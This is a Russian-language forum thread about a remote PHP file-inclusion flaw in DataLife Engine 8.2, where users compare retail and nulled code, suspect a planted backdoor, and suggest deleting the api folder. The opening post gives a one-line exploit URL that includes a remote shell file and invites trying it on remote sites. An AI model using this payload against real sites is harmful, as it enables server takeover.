Инфо PHP-инклюдинг в DataLife Engine

Тема в разделе "DLE", создана пользователем E-body, 5 сен 2009.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. E-body

    E-body

    Регистр.:
    6 сен 2007
    Сообщения:
    982
    Симпатии:
    319
    Версия: DataLife Engine 8.2
    Лицензия: Лицензия от целсофт и нулл
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «dle_config_api» сценарием api.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Эксплоит:
    www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
    Источник: _http://www.xakep.ru/post/49351/default.asp
    п.с. надо попробовать, отпишитесь если у кого вышло как на локалке так и на удаленных. Целсофт превед, публикуй фикс :p
     
    kwin, comua, palec и ещё 1-му нравится это.
  2. palec

    palec

    Регистр.:
    6 дек 2006
    Сообщения:
    272
    Симпатии:
    34
    И как закрить дирку? :nezn:
     
  3. dm_mb

    dm_mb

    Регистр.:
    6 июн 2006
    Сообщения:
    610
    Симпатии:
    122
    никак. на оф версии попробовал - пусто. а вот на мидтимовской работает :)
     
  4. eshkin

    eshkin

    Регистр.:
    13 апр 2006
    Сообщения:
    598
    Симпатии:
    256
    вот - нашёл отличия

    сравнил api.class из ретейла и мидовского нула
    слева ретейл, справа нулл
    [​IMG]
    в мидовском $dle_api зачем то вынесено..
     

    Вложения:

    A.V.R-Team и Budrin нравится это.
  5. Budrin

    Budrin Читатель

    Заблокирован
    Регистр.:
    1 фев 2008
    Сообщения:
    297
    Симпатии:
    45
    хм.... хотелось бы услышать мэдмэна.... я апи всегда от разработчика беру)))) свежую... даже помогаю советами :ah:
     
  6. eshkin

    eshkin

    Регистр.:
    13 апр 2006
    Сообщения:
    598
    Симпатии:
    256
    ваще непонятно, у кого есть переменная dle_config_api? откуда она взялась в найденном баге?
    никак не соображу в чём прикол..
     
  7. El_Magnifico

    El_Magnifico Команданте

    Регистр.:
    1 сен 2006
    Сообщения:
    653
    Симпатии:
    487
    а это спецом сделанно что бы можно было проникать в систему самому )) так сказать спрятанный бекдор
     
  8. eshkin

    eshkin

    Регистр.:
    13 апр 2006
    Сообщения:
    598
    Симпатии:
    256
    а кем сделано, можно узнать? если честно, я не понял предназначения этого бека :D зачем мне проникать в свою же систему через (*)? делаю вывод, что всёж не для хозяйского удобства это было задумано:)
     
  9. gendncc

    gendncc Создатель

    Регистр.:
    6 дек 2007
    Сообщения:
    41
    Симпатии:
    1
    чет не понял о чем речь, есть серьезная уязвимость в движке новом, вчера блин как раз обновился с помощью мидтимовского нула, есть уже заплатки? кто что предпринял?
     
  10. Ruxx

    Ruxx Создатель

    Регистр.:
    25 фев 2009
    Сообщения:
    25
    Симпатии:
    2
    gendncc,
    Как вариан удалить файл api.class и папку api.
     
Статус темы:
Закрыта.